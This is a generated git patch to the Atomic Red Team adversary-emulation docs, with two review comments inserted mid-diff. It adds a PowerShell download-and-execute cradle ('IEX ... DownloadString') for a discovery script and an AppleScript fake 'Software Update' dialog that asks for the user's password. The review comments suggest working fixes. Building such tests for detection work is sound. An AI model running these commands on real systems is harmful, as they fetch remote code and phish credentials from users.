From 2a40652162be071bfb6020ac5ef243136ac66f85 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 21 May 2019 12:09:28 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1074/T1074.md | 19 +++++++++++++++++-- atomics/T1141/T1141.md | 20 ++++++++++++++++++-- atomics/index.md | 6 ++++-- atomics/index.yaml | 28 ++++++++++++++++++++++++++++ atomics/linux-index.md | 2 +- atomics/macos-index.md | 3 ++- atomics/windows-index.md | 3 ++- 7 files changed, 72 insertions(+), 9 deletions(-) diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index 3b968eb4..e285a19a 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -6,12 +6,27 @@ Interactive command shells may be used, and common functionality within [cmd](ht ## Atomic Tests -- [Atomic Test #1 - Stage data from Discovery.sh](#atomic-test-1---stage-data-from-discoverysh) +- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat) + +- [Atomic Test #2 - Stage data from Discovery.sh](#atomic-test-2---stage-data-from-discoverysh)
-## Atomic Test #1 - Stage data from Discovery.sh +## Atomic Test #1 - Stage data from Discovery.bat +Utilize powershell to download discovery.bat and save to a local file + +**Supported Platforms:** Windows + + +#### Run it with `powershell`! +``` +"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log +``` +
+
+ +## Atomic Test #2 - Stage data from Discovery.sh Utilize curl to download discovery.sh and execute a basic information gathering shell script **Supported Platforms:** Linux, macOS diff --git a/atomics/T1141/T1141.md b/atomics/T1141/T1141.md index f049c14a..f0e57adc 100644 --- a/atomics/T1141/T1141.md +++ b/atomics/T1141/T1141.md @@ -6,12 +6,28 @@ Adversaries may mimic this functionality to prompt users for credentials with a ## Atomic Tests -- [Atomic Test #1 - PowerShell - Prompt User for Password](#atomic-test-1---powershell---prompt-user-for-password) +- [Atomic Test #1 - AppleScript - Prompt User for Password](#atomic-test-1---applescript---prompt-user-for-password) + +- [Atomic Test #2 - PowerShell - Prompt User for Password](#atomic-test-2---powershell---prompt-user-for-password)
-## Atomic Test #1 - PowerShell - Prompt User for Password +## Atomic Test #1 - AppleScript - Prompt User for Password +Prompt User for Password (Local Phishing) +Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html + +**Supported Platforms:** macOS + + +#### Run it with `sh`! +``` +osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' +``` +
+
+ +## Atomic Test #2 - PowerShell - Prompt User for Password Prompt User for Password (Local Phishing) as seen in Stitch RAT. Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py diff --git a/atomics/index.md b/atomics/index.md index c79239f3..0a303b78 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -529,7 +529,8 @@ - [T1056 Input Capture](./T1056/T1056.md) - Atomic Test #1: Input Capture [windows] - [T1141 Input Prompt](./T1141/T1141.md) - - Atomic Test #1: PowerShell - Prompt User for Password [windows] + - Atomic Test #1: AppleScript - Prompt User for Password [macos] + - Atomic Test #2: PowerShell - Prompt User for Password [windows] - T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1142 Keychain](./T1142/T1142.md) - Atomic Test #1: Keychain [macos] @@ -693,7 +694,8 @@ - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows] - Atomic Test #2: PowerShell [windows] - [T1074 Data Staged](./T1074/T1074.md) - - Atomic Test #1: Stage data from Discovery.sh [linux, macos] + - Atomic Test #1: Stage data from Discovery.bat [windows] + - Atomic Test #2: Stage data from Discovery.sh [linux, macos] - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1005 Data from Local System](./T1005/T1005.md) - Atomic Test #1: Search macOS Safari Cookies [macos] diff --git a/atomics/index.yaml b/atomics/index.yaml index 438a11e7..e227ccf8 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -15170,6 +15170,21 @@ credential-access: - User identifier: T1141 atomic_tests: + - name: AppleScript - Prompt User for Password + description: | + Prompt User for Password (Local Phishing) + Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html + supported_platforms: + - macos + executor: + name: sh + command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell + app "System Preferences" to activate'' -e ''tell app "System Preferences" + to display dialog "Software Update requires that you type your password + to apply changes." & return & return default answer "" with icon 1 with + hidden answer with title "Software Update"'' + +' - name: PowerShell - Prompt User for Password description: | Prompt User for Password (Local Phishing) as seen in Stitch RAT. @@ -19554,6 +19569,19 @@ collection: Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. identifier: T1074 atomic_tests: + - name: Stage data from Discovery.bat + description: 'Utilize powershell to download discovery.bat and save to a local + file + +' + supported_platforms: + - windows + executor: + name: powershell + command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat'')" + > c:\windows\pi.log + +' - name: Stage data from Discovery.sh description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script diff --git a/atomics/linux-index.md b/atomics/linux-index.md index 0a0c980d..4531e1ba 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md 
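Review bot: The `command` of the new `AppleScript - Prompt User for Password` test passes `-e ''tell app "System Preferences" to activate''` twice; the second copy is redundant and should be dropped so the scalar reads `osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog ...'`. The description also deserves a caveat: `display dialog ... with hidden answer` presumably returns the typed text as the script result, which osascript prints to stdout, so whatever the operator types at the fake prompt can end up in the runner's execution log — advise entering a throwaway value or appending `> /dev/null`. Because `index.yaml` is generated, the change belongs in the technique's source atomic file and should be regenerated from there.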
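Review bot: The `command` of the new `Stage data from Discovery.bat` test does not download anything, contrary to its description: the whole `IEX (New-Object Net.WebClient).DownloadString(...)` expression sits inside a double-quoted string that is only redirected to `c:\windows\pi.log`, so PowerShell writes that literal text into the file and never evaluates IEX or contacts raw.githubusercontent.com. If the intent is to stage the fetched script contents, drop the outer quotes: `command: '(New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat'') > c:\windows\pi.log'`; if the intent really is to stage a command string, the description should say that instead of "download". Writing under `c:\windows\` presumably requires an elevated shell, and nothing removes `pi.log` afterwards, so an elevation note and a cleanup step (if the executor schema supports one) would help testers. Since `index.yaml` is generated output, apply the fix in the technique's source atomic file and regenerate.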
@@ -95,7 +95,7 @@ - [T1119 Automated Collection](./T1119/T1119.md) - [T1115 Clipboard Data](./T1115/T1115.md) - [T1074 Data Staged](./T1074/T1074.md) - - Atomic Test #1: Stage data from Discovery.sh [linux, macos] + - Atomic Test #2: Stage data from Discovery.sh [linux, macos] - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1005 Data from Local System](./T1005/T1005.md) - T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/macos-index.md b/atomics/macos-index.md index 970d5dd6..dd3b780c 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -145,7 +145,7 @@ - [T1119 Automated Collection](./T1119/T1119.md) - [T1115 Clipboard Data](./T1115/T1115.md) - [T1074 Data Staged](./T1074/T1074.md) - - Atomic Test #1: Stage data from Discovery.sh [linux, macos] + - Atomic Test #2: Stage data from Discovery.sh [linux, macos] - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1005 Data from Local System](./T1005/T1005.md) - Atomic Test #1: Search macOS Safari Cookies [macos] @@ -187,6 +187,7 @@ - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056 Input Capture](./T1056/T1056.md) - [T1141 Input Prompt](./T1141/T1141.md) + - Atomic Test #1: AppleScript - Prompt User for Password [macos] - [T1142 Keychain](./T1142/T1142.md) - Atomic Test #1: Keychain [macos] - [T1040 Network Sniffing](./T1040/T1040.md) diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 9ad857b8..aa3c3cc3 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md 
@@ -360,7 +360,7 @@ - [T1056 Input Capture](./T1056/T1056.md) - Atomic Test #1: Input Capture [windows] - [T1141 Input Prompt](./T1141/T1141.md) - - Atomic Test #1: PowerShell - Prompt User for Password [windows] + - Atomic Test #2: PowerShell - Prompt User for Password [windows] - T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1040 Network Sniffing](./T1040/T1040.md) @@ -413,6 +413,7 @@ - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows] - Atomic Test #2: PowerShell [windows] - [T1074 Data Staged](./T1074/T1074.md) + - Atomic Test #1: Stage data from Discovery.bat [windows] - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1005 Data from Local System](./T1005/T1005.md) - T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)